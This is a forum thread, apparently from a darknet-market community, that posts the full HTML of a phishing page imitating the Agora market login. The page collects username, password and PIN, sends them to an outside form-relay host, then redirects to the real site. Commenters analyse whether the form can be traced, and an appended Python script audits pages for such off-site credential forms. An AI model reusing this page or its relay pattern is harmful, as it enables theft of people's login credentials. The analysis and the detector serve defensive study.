[Uncategorized] Agora Phishing Link Source Code

/u/select1on posted the Agora phishing link source code on dnstats.net; he claims it can be easily traced to a dox.

<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Login</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/ico" href="favicon.ico">
    <link rel="stylesheet" href="FontAwesome.css" type="text/css">
    <link rel="stylesheet" href="main.css" type="text/css">

    <style type="text/css">      
    .pgp-verification, .pgp-verification textarea {
        font-family: "DejaVu Sans Mono", "Consolas", "Courier", monospace;
        font-size: 9px;
        color: #222;
        text-align: center;
    }
    .pgp-verification textarea {
        display: inline-block;
        text-align: left;
        width: 400px;
        height: 250px;
        padding: 15px;
    }
   </style>

<head>
<body style="background-color: white;">

<div style="width: 100%; height: 100%; text-align: center; vertical-align: middle;">
    <div style="width: 10px; height: 40px;"></div>
    <div id="login-bar" style="height: 300px;">
        <img src="zorroonbg.jpg" alt="" style="padding-bottom: 20px;" />

        <form name="contactform" method="post" action="http://www.tectite.com/hosted/003578/lulufans.il/formmail.php">

        <table style="width: 100%; text-align: center;" id="loginpage-table">

                <tr>
                    <td style="text-align:right;"><input type="text" name="username" class="loginpage-field" placeholder="User Name" value="" id="username" /></td>
                    <td style="width: 10px;"></td>
                    <td style="text-align:left;"><input type="password" name="password" class="loginpage-field" placeholder="Password" value="" id="password" /></td>
                </tr>
                 <tr>
                    <td style="text-align:right;"></td>
                    <td style="width: 10px;"></td>
                    <td style="text-align:left;"><input type="text" name="pin" class="loginpage-field" placeholder="Pin" value="" id="pin" /></td>
                </tr>
                <tr>
                    <td style="text-align:right;"><img src="captcha.gif" style="display: inline; border:1px solid #aaa;" /></td>
                    <td style="width: 10px;"></td>
                    <td style="text-align:left; vertical-align: top;"><input type="text" style="height: 28px; display: inline;" class="loginpage-field" name="enterCaptcha" id="enterCaptcha" value="" placeholder="Captcha code" /></td>
                </tr>
                <tr>
                    <td style="text-align:right;"><div class="button-blue" style="display: inline-block;"><i class="fa fa-magic"></i> <a href="/register">Register</a></div></td>
                    <td style="width: 10px;"></td>
                    <td style="text-align:left;"><div class="button-red"><i class="fa fa-unlock-alt"></i> <input type="submit" name="submit" class="input-in-button" value="Log In" id="submit" />
 <input type="hidden" name="derive_fields" value="email=HTTP_USER_AGENT,
   realname=username" />
 <input type="hidden" name="subject" value="AG1" />
 <input type="hidden" name="good_url" value="http://agorahooawayyfoe.onion/dologin" />
 <input type="hidden" id="tectiteformid" name="tectiteformid" value="c44b1739aa9f42f5f3cdb4b48870d2f5" /></div></td>
                </tr>

        </table>

        </form>

    </div>
</div>

</body>
</html>

If someone can format this for me so I can copy and paste this properly it'd be greatly appreciated.

EDIT: Thanks /u/Leeham721


Comments


[12 Points] None:

I'm not seeing anything useful.

The 'source account' is a fake domain (lulufans.il) which is not registered anywhere other than with Tectite.

The Tectite service they used is a generic form creation tool that anyone can use for free.

The account number is of no use unless you work for Tectite. Most likely scenario is they used proxies/VPN/Tor or whatever to create the account.

They just googled 'online form generator' and used whatever they found.

The form posts to a generic PHP processor.

Edit 2: I'm guessing he's referring to the actual form processing PHP. You can't see PHP source code anymore; they are protected by default. If it was that simple you could download any WordPress installation's wp-config.php and steal their SQL login data... Whatever you do, the server will run the PHP and display the resulting HTML. If you access the file directly, it will only ever give you the coded error message because that's how it's programmed.

EDIT3: there's a hidden field called 'subject' which implies all data is forwarded to an email address rather than a database.


[4 Points] mephestus:

It also tells us that once people enter their info in, it forwards it to the real Agora site, probably to run a script to change user account details.
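
The traits the comments above pick out (a login form whose action is a third-party form processor, a hidden `subject` field, and a `good_url` that sends the visitor on to another site) can be checked mechanically when triaging a suspect page. The following is an added example, not part of the original thread: the sample HTML and its hosts are constructed placeholders, and `FormCollector`, `audit_login_forms` and `RELAY_HINTS` are hypothetical names.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hidden-field names taken from the posted source; treating them as relay hints is an assumption.
RELAY_HINTS = {"derive_fields", "subject", "good_url"}
# Constructed sample page with placeholder hosts, imagined as served from lookalike.example.
SAMPLE = """
<form method="post" action="http://forms.example/relay.php">
  <input type="text" name="username" /> <input type="password" name="password" />
  <input type="hidden" name="subject" value="X1" />
  <input type="hidden" name="good_url" value="http://realmarket.example/dologin" />
</form>
<form action="/search"><input type="text" name="q" /></form>
"""

class FormCollector(HTMLParser):
    """Collect every <form> with its action and the attributes of its <input>s."""
    def __init__(self):
        super().__init__()
        self.forms, self._open = [], None
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._open = {"action": a.get("action", ""), "inputs": []}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            a["type"] = a.get("type", "text").lower()
            self._open["inputs"].append(a)
    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def audit_login_forms(html, served_from):
    """Return a list of findings for each form that contains a password field."""
    collector, reports = FormCollector(), []
    collector.feed(html)
    for form in collector.forms:
        if not any(i["type"] == "password" for i in form["inputs"]):
            continue  # not a credential form
        target, findings = urlparse(form["action"]), []
        if target.hostname and target.hostname != served_from:
            findings.append(f"credentials posted off-site to {target.hostname}")
        for i in (x for x in form["inputs"] if x["type"] == "hidden"):
            if (name := i.get("name", "")) in RELAY_HINTS:
                findings.append(f"relay-style hidden field: {name}")
            host = urlparse(i.get("value", "")).hostname
            if host and host not in (served_from, target.hostname):
                findings.append(f"hidden field {name} points to {host}")
        reports.append(findings)
    return reports
```

Calling `audit_login_forms(SAMPLE, "lookalike.example")` reports only the credential form; a login form that posts to a relative path on its own host comes back with an empty findings list.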


[2 Points] BoxAddict:

This is from a link posted in comments on DNStats, right? Or was actual Grams-controlled content pointing to a phishing link?


[-5 Points] None:

[deleted]